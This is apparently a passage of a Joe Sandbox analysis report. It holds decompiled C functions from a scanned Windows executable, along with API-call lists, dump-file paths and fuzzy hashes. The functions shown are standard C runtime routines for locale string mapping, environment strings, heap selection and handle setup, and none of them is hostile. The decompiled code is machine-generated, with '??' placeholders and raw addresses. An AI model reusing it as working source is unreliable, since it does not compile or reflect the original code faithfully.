                                          				intOrPtr _t101;
                                          				short* _t102;
                                          				int _t104;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x41be00);
                                          				_push(E00414A2C);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t101;
                                          				_t102 = _t101 - 0x1c;
                                          				_v28 = _t102;
                                          				_t104 =  *0x423554; // 0x1
                                          				if(_t104 != 0) {
                                          					L5:
                                          					if(_a16 > 0) {
                                          						_t83 = E00418A41(_a12, _a16);
                                          						_pop(_t91);
                                          						_a16 = _t83;
                                          					}
                                          					_t61 =  *0x423554; // 0x1
                                          					if(_t61 != 2) {
                                          						if(_t61 != 1) {
                                          							goto L21;
                                          						} else {
                                          							if(_a28 == 0) {
                                          								_t82 =  *0x42354c; // 0x0
                                          								_a28 = _t82;
                                          							}
                                          							asm("sbb eax, eax");
                                          							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                                          							_v32 = _t88;
                                          							if(_t88 == 0) {
                                          								goto L21;
                                          							} else {
                                          								_v8 = 0;
                                          								E00413CC0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                                          								_v28 = _t102;
                                          								_v40 = _t102;
                                          								_v8 = _v8 | 0xffffffff;
                                          								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                                          									goto L21;
                                          								} else {
                                          									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                                          									_v44 = _t99;
                                          									if(_t99 == 0) {
                                          										goto L21;
                                          									} else {
                                          										if((_a9 & 0x00000004) == 0) {
                                          											_v8 = 1;
                                          											E00413CC0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                                          											_v28 = _t102;
                                          											_t89 = _t102;
                                          											_v36 = _t89;
                                          											_v8 = _v8 | 0xffffffff;
                                          											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                                          												goto L21;
                                          											} else {
                                          												_push(0);
                                          												_push(0);
                                          												if(_a24 != 0) {
                                          													_push(_a24);
                                          													_push(_a20);
                                          												} else {
                                          													_push(0);
                                          													_push(0);
                                          												}
                                          												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                                          												if(_t99 == 0) {
                                          													goto L21;
                                          												} else {
                                          													goto L30;
                                          												}
                                          											}
                                          										} else {
                                          											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                                          												L30:
                                          												_t62 = _t99;
                                          											} else {
                                          												goto L21;
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					} else {
                                          						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                          					}
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_t90 = 1;
                                          					if(LCMapStringW(0, 0x100, 0x41bdf8, _t90, ??, ??) == 0) {
                                          						if(LCMapStringA(0, 0x100, 0x41bdf4, _t90, 0, 0) == 0) {
                                          							L21:
                                          							_t62 = 0;
                                          						} else {
                                          							 *0x423554 = 2;
                                          							goto L5;
                                          						}
                                          					} else {
                                          						 *0x423554 = _t90;
                                          						goto L5;
                                          					}
                                          				}
                                          				 *[fs:0x0] = _v20;
                                          				return _t62;
                                          			}
























                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,74CB70F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                                          • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                                          • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,74CB70F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                                          • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,74CB70F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                                          • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                                          • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                                          • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                                          Similarity
                                          • API ID: String$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 352835431-0
                                          • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                                          • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                                          • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                                          • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041750F() {
                                          				int _v4;
                                          				int _v8;
                                          				intOrPtr _t7;
                                          				CHAR* _t9;
                                          				WCHAR* _t17;
                                          				int _t20;
                                          				char* _t24;
                                          				int _t32;
                                          				CHAR* _t36;
                                          				WCHAR* _t38;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t7 =  *0x423508; // 0x1
                                          				_t32 = 0;
                                          				_t38 = 0;
                                          				_t36 = 0;
                                          				if(_t7 != 0) {
                                          					if(_t7 != 1) {
                                          						if(_t7 != 2) {
                                          							L27:
                                          							return 0;
                                          						}
                                          						L18:
                                          						if(_t36 != _t32) {
                                          							L20:
                                          							_t9 = _t36;
                                          							if( *_t36 == _t32) {
                                          								L23:
                                          								_t41 = _t9 - _t36 + 1;
                                          								_t39 = E00413E65(_t9 - _t36 + 1);
                                          								if(_t39 != _t32) {
                                          									E00414090(_t39, _t36, _t41);
                                          								} else {
                                          									_t39 = 0;
                                          								}
                                          								FreeEnvironmentStringsA(_t36);
                                          								return _t39;
                                          							} else {
                                          								goto L21;
                                          							}
                                          							do {
                                          								do {
                                          									L21:
                                          									_t9 =  &(_t9[1]);
                                          								} while ( *_t9 != _t32);
                                          								_t9 =  &(_t9[1]);
                                          							} while ( *_t9 != _t32);
                                          							goto L23;
                                          						}
                                          						_t36 = GetEnvironmentStrings();
                                          						if(_t36 == _t32) {
                                          							goto L27;
                                          						}
                                          						goto L20;
                                          					}
                                          					L6:
                                          					if(_t38 != _t32) {
                                          						L8:
                                          						_t17 = _t38;
                                          						if( *_t38 == _t32) {
                                          							L11:
                                          							_t20 = (_t17 - _t38 >> 1) + 1;
                                          							_v4 = _t20;
                                          							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
                                          							if(_t42 != _t32) {
                                          								_t24 = E00413E65(_t42);
                                          								_v8 = _t24;
                                          								if(_t24 != _t32) {
                                          									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
                                          										E00413F9F(_v8);
                                          										_v8 = _t32;
                                          									}
                                          									_t32 = _v8;
                                          								}
                                          							}
                                          							FreeEnvironmentStringsW(_t38);
                                          							return _t32;
                                          						} else {
                                          							goto L9;
                                          						}
                                          						do {
                                          							do {
                                          								L9:
                                          								_t17 =  &(_t17[1]);
                                          							} while ( *_t17 != _t32);
                                          							_t17 =  &(_t17[1]);
                                          						} while ( *_t17 != _t32);
                                          						goto L11;
                                          					}
                                          					_t38 = GetEnvironmentStringsW();
                                          					if(_t38 == _t32) {
                                          						goto L27;
                                          					}
                                          					goto L8;
                                          				}
                                          				_t38 = GetEnvironmentStringsW();
                                          				if(_t38 == 0) {
                                          					_t36 = GetEnvironmentStrings();
                                          					if(_t36 == 0) {
                                          						goto L27;
                                          					}
                                          					 *0x423508 = 2;
                                          					goto L18;
                                          				}
                                          				 *0x423508 = 1;
                                          				goto L6;
                                          			}
















                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                          • String ID:
                                          • API String ID: 1823725401-0
                                          • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                                          • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                                          • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                                          • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E00418A6C(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
                                          				int _v8;
                                          				intOrPtr _v20;
                                          				short* _v28;
                                          				short _v32;
                                          				int _v36;
                                          				short* _v40;
                                          				void* _v56;
                                          				int _t31;
                                          				int _t32;
                                          				int _t37;
                                          				int _t43;
                                          				int _t44;
                                          				int _t45;
                                          				void* _t53;
                                          				short* _t60;
                                          				int _t61;
                                          				intOrPtr _t62;
                                          				short* _t63;
                                          
                                          				_push(0xffffffff);
                                          				_push(0x41be18);
                                          				_push(E00414A2C);
                                          				_push( *[fs:0x0]);
                                          				 *[fs:0x0] = _t62;
                                          				_t63 = _t62 - 0x18;
                                          				_v28 = _t63;
                                          				_t31 =  *0x423558; // 0x1
                                          				if(_t31 != 0) {
                                          					L6:
                                          					if(_t31 != 2) {
                                          						if(_t31 != 1) {
                                          							goto L18;
                                          						} else {
                                          							if(_a20 == 0) {
                                          								_t44 =  *0x42354c; // 0x0
                                          								_a20 = _t44;
                                          							}
                                          							asm("sbb eax, eax");
                                          							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
                                          							_v36 = _t37;
                                          							if(_t37 == 0) {
                                          								goto L18;
                                          							} else {
                                          								_v8 = 0;
                                          								E00413CC0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
                                          								_v28 = _t63;
                                          								_t60 = _t63;
                                          								_v40 = _t60;
                                          								E00417DA0(_t60, 0, _t37 + _t37);
                                          								_v8 = _v8 | 0xffffffff;
                                          								if(_t60 == 0) {
                                          									goto L18;
                                          								} else {
                                          									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
                                          									if(_t43 == 0) {
                                          										goto L18;
                                          									} else {
                                          										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
                                          									}
                                          								}
                                          							}
                                          						}
                                          					} else {
                                          						_t45 = _a24;
                                          						if(_t45 == 0) {
                                          							_t45 =  *0x42353c; // 0x0
                                          						}
                                          						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
                                          					}
                                          				} else {
                                          					_push( &_v32);
                                          					_t61 = 1;
                                          					if(GetStringTypeW(_t61, 0x41bdf8, _t61, ??) == 0) {
                                          						if(GetStringTypeA(0, _t61, 0x41bdf4, _t61,  &_v32) == 0) {
                                          							L18:
                                          							_t32 = 0;
                                          						} else {
                                          							_t31 = 2;
                                          							goto L5;
                                          						}
                                          					} else {
                                          						_t31 = _t61;
                                          						L5:
                                          						 *0x423558 = _t31;
                                          						goto L6;
                                          					}
                                          				}
                                          				 *[fs:0x0] = _v20;
                                          				return _t32;
                                          			}






















                                          APIs
                                          • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,74CB70F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                                          • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                                          • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,74CB70F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                                          • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,74CB70F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                                          • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                                          Similarity
                                          • API ID: StringType$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 3852931651-0
                                          • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                                          • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                                          • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                                          • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E004158B0(void* __ecx, void* __eflags) {
                                          				char _v8;
                                          				struct _OSVERSIONINFOA _v156;
                                          				char _v416;
                                          				char _v4656;
                                          				void* _t24;
                                          				CHAR* _t32;
                                          				void* _t33;
                                          				intOrPtr* _t34;
                                          				void* _t35;
                                          				char _t36;
                                          				char _t38;
                                          				void* _t40;
                                          				char* _t44;
                                          				char* _t45;
                                          				char* _t50;
                                          
                                          				E00413CC0(0x122c, __ecx);
                                          				_v156.dwOSVersionInfoSize = 0x94;
                                          				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
                                          					_t40 = 1;
                                          					return _t40;
                                          				}
                                          				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
                                          					L28:
                                          					_t24 = E00415883( &_v8);
                                          					asm("sbb eax, eax");
                                          					return _t24 + 3;
                                          				}
                                          				_t44 =  &_v4656;
                                          				if(_v4656 != 0) {
                                          					do {
                                          						_t38 =  *_t44;
                                          						if(_t38 >= 0x61 && _t38 <= 0x7a) {
                                          							 *_t44 = _t38 - 0x20;
                                          						}
                                          						_t44 = _t44 + 1;
                                          					} while ( *_t44 != 0);
                                          				}
                                          				if(E00417D60("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
                                          					GetModuleFileNameA(0,  &_v416, 0x104);
                                          					_t45 =  &_v416;
                                          					if(_v416 != 0) {
                                          						do {
                                          							_t36 =  *_t45;
                                          							if(_t36 >= 0x61 && _t36 <= 0x7a) {
                                          								 *_t45 = _t36 - 0x20;
                                          							}
                                          							_t45 = _t45 + 1;
                                          						} while ( *_t45 != 0);
                                          					}
                                          					_t32 = E00417CE0( &_v4656,  &_v416);
                                          				} else {
                                          					_t32 =  &_v4656;
                                          				}
                                          				if(_t32 == 0) {
                                          					goto L28;
                                          				}
                                          				_t33 = E00417C20(_t32, 0x2c);
                                          				if(_t33 == 0) {
                                          					goto L28;
                                          				}
                                          				_t34 = _t33 + 1;
                                          				_t50 = _t34;
                                          				if( *_t34 != 0) {
                                          					do {
                                          						if( *_t50 != 0x3b) {
                                          							_t50 = _t50 + 1;
                                          						} else {
                                          							 *_t50 = 0;
                                          						}
                                          					} while ( *_t50 != 0);
                                          				}
                                          				_t35 = E004179F0(_t34, 0, 0xa);
                                          				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
                                          					goto L28;
                                          				}
                                          				return _t35;
                                          			}



















                                          APIs
                                          • GetVersionExA.KERNEL32 ref: 004158CF
                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                          • API String ID: 1385375860-4131005785
                                          • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                                          • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                                          • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                                          • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E00417641() {
                                          				void** _v8;
                                          				struct _STARTUPINFOA _v76;
                                          				signed int* _t48;
                                          				signed int _t50;
                                          				long _t55;
                                          				signed int _t57;
                                          				signed int _t58;
                                          				int _t59;
                                          				signed char _t63;
                                          				signed int _t65;
                                          				void** _t67;
                                          				int _t68;
                                          				int _t69;
                                          				signed int* _t70;
                                          				int _t72;
                                          				intOrPtr* _t73;
                                          				signed int* _t75;
                                          				void* _t76;
                                          				void* _t84;
                                          				void* _t87;
                                          				int _t88;
                                          				signed int* _t89;
                                          				void** _t90;
                                          				signed int _t91;
                                          				int* _t92;
                                          
                                          				_t89 = E00413E65(0x480);
                                          				if(_t89 == 0) {
                                          					E00414C0C(0x1b);
                                          				}
                                          				 *0x425900 = _t89;
                                          				 *0x425a00 = 0x20;
                                          				_t1 =  &(_t89[0x120]); // 0x480
                                          				_t48 = _t1;
                                          				while(_t89 < _t48) {
                                          					_t89[1] = _t89[1] & 0x00000000;
                                          					 *_t89 =  *_t89 | 0xffffffff;
                                          					_t89[2] = _t89[2] & 0x00000000;
                                          					_t89[1] = 0xa;
                                          					_t70 =  *0x425900; // 0x770630
                                          					_t89 =  &(_t89[9]);
                                          					_t48 =  &(_t70[0x120]);
                                          				}
                                          				GetStartupInfoA( &_v76);
                                          				__eflags = _v76.cbReserved2;
                                          				if(_v76.cbReserved2 == 0) {
                                          					L25:
                                          					_t72 = 0;
                                          					__eflags = 0;
                                          					do {
                                          						_t75 =  *0x425900; // 0x770630
                                          						_t50 = _t72 + _t72 * 8;
                                          						__eflags = _t75[_t50] - 0xffffffff;
                                          						_t90 =  &(_t75[_t50]);
                                          						if(_t75[_t50] != 0xffffffff) {
                                          							_t45 =  &(_t90[1]);
                                          							 *_t45 = _t90[1] | 0x00000080;
                                          							__eflags =  *_t45;
                                          							goto L37;
                                          						}
                                          						__eflags = _t72;
                                          						_t90[1] = 0x81;
                                          						if(_t72 != 0) {
                                          							asm("sbb eax, eax");
                                          							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                                          							__eflags = _t55;
                                          						} else {
                                          							_t55 = 0xfffffff6;
                                          						}
                                          						_t87 = GetStdHandle(_t55);
                                          						__eflags = _t87 - 0xffffffff;
                                          						if(_t87 == 0xffffffff) {
                                          							L33:
                                          							_t90[1] = _t90[1] | 0x00000040;
                                          						} else {
                                          							_t57 = GetFileType(_t87);
                                          							__eflags = _t57;
                                          							if(_t57 == 0) {
                                          								goto L33;
                                          							}
                                          							_t58 = _t57 & 0x000000ff;
                                          							 *_t90 = _t87;
                                          							__eflags = _t58 - 2;
                                          							if(_t58 != 2) {
                                          								__eflags = _t58 - 3;
                                          								if(_t58 == 3) {
                                          									_t90[1] = _t90[1] | 0x00000008;
                                          								}
                                          								goto L37;
                                          							}
                                          							goto L33;
                                          						}
                                          						L37:
                                          						_t72 = _t72 + 1;
                                          						__eflags = _t72 - 3;
                                          					} while (_t72 < 3);
                                          					return SetHandleCount( *0x425a00);
                                          				}
                                          				_t59 = _v76.lpReserved2;
                                          				__eflags = _t59;
                                          				if(_t59 == 0) {
                                          					goto L25;
                                          				}
                                          				_t88 =  *_t59;
                                          				_t73 = _t59 + 4;
                                          				_v8 = _t73 + _t88;
                                          				__eflags = _t88 - 0x800;
                                          				if(_t88 >= 0x800) {
                                          					_t88 = 0x800;
                                          				}
                                          				__eflags =  *0x425a00 - _t88; // 0x20
                                          				if(__eflags >= 0) {
                                          					L18:
                                          					_t91 = 0;
                                          					__eflags = _t88;
                                          					if(_t88 <= 0) {
                                          						goto L25;
                                          					} else {
                                          						goto L19;
                                          					}
                                          					do {
                                          						L19:
                                          						_t76 =  *_v8;
                                          						__eflags = _t76 - 0xffffffff;
                                          						if(_t76 == 0xffffffff) {
                                          							goto L24;
                                          						}
                                          						_t63 =  *_t73;
                                          						__eflags = _t63 & 0x00000001;
                                          						if((_t63 & 0x00000001) == 0) {
                                          							goto L24;
                                          						}
                                          						__eflags = _t63 & 0x00000008;
                                          						if((_t63 & 0x00000008) != 0) {
                                          							L23:
                                          							_t65 = _t91 & 0x0000001f;
                                          							__eflags = _t65;
                                          							_t67 =  &(0x425900[_t91 >> 5][_t65 + _t65 * 8]);
                                          							 *_t67 =  *_v8;
                                          							_t67[1] =  *_t73;
                                          							goto L24;
                                          						}
                                          						_t68 = GetFileType(_t76);
                                          						__eflags = _t68;
                                          						if(_t68 == 0) {
                                          							goto L24;
                                          						}
                                          						goto L23;
                                          						L24:
                                          						_v8 =  &(_v8[1]);
                                          						_t91 = _t91 + 1;
                                          						_t73 = _t73 + 1;
                                          						__eflags = _t91 - _t88;
                                          					} while (_t91 < _t88);
                                          					goto L25;
                                          				} else {
                                          					_t92 = 0x425904;
                                          					while(1) {
                                          						_t69 = E00413E65(0x480);
                                          						__eflags = _t69;
                                          						if(_t69 == 0) {
                                          							break;
                                          						}
                                          						 *0x425a00 =  *0x425a00 + 0x20;
                                          						__eflags =  *0x425a00;
                                          						 *_t92 = _t69;
                                          						_t13 = _t69 + 0x480; // 0x480
                                          						_t84 = _t13;
                                          						while(1) {
                                          							__eflags = _t69 - _t84;
                                          							if(_t69 >= _t84) {
                                          								break;
                                          							}
                                          							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                                          							 *_t69 =  *_t69 | 0xffffffff;
                                          							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                                          							 *((char*)(_t69 + 5)) = 0xa;
                                          							_t69 = _t69 + 0x24;
                                          							_t84 =  *_t92 + 0x480;
                                          						}
                                          						_t92 =  &(_t92[1]);
                                          						__eflags =  *0x425a00 - _t88; // 0x20
                                          						if(__eflags < 0) {
                                          							continue;
                                          						}
                                          						goto L18;
                                          					}
                                          					_t88 =  *0x425a00; // 0x20
                                          					goto L18;
                                          				}
                                          			}

                                          APIs
                                          • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                                          • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                                          • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                                          • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                                          • SetHandleCount.KERNEL32 ref: 004177F2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileHandleType$CountInfoStartup
                                          • String ID:
                                          • API String ID: 1710529072-0
                                          • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                                          • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                                          • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                                          • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E00403AA7(signed int __ecx) {
                                          				short _v6;
                                          				char _v12;
                                          				short _t12;
                                          				short _t27;
                                          				int _t29;
                                          				void* _t30;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_v6 = __ecx;
                                          				if(__ecx != 0) {
                                          					_t27 = CharUpperW(__ecx & 0x0000ffff);
                                          					if(_t27 != 0 || GetLastError() != 0x78) {
                                          						_t12 = _t27;
                                          					} else {
                                          						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
                                          						if(_t29 != 0 && _t29 <= 4) {
                                          							 *((char*)(_t30 + _t29 - 8)) = 0;
                                          							CharUpperA( &_v12);
                                          							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
                                          						}
                                          						_t12 = _v6;
                                          					}
                                          				} else {
                                          					_t12 = 0;
                                          				}
                                          				return _t12;
                                          			}

                                          APIs
                                          • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                                          • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                                          • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Char$ByteMultiUpperWide$ErrorLast
                                          • String ID:
                                          • API String ID: 3939315453-0
                                          • Opcode ID: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                                          • Instruction ID: 0842cb939f6927aecb542cd9758d214692c03acffe84293a02396fd76ee0080f
                                          • Opcode Fuzzy Hash: 209c94fe8e33f847f2405d3a9712247a1b8bb9216b5908a8917fe0bd7a80c077
                                          • Instruction Fuzzy Hash: B30144B65001197ADB20ABE49CC9DEBBA7CDB08259F414572F942A3281E3756E4487B8
                                          Uniqueness

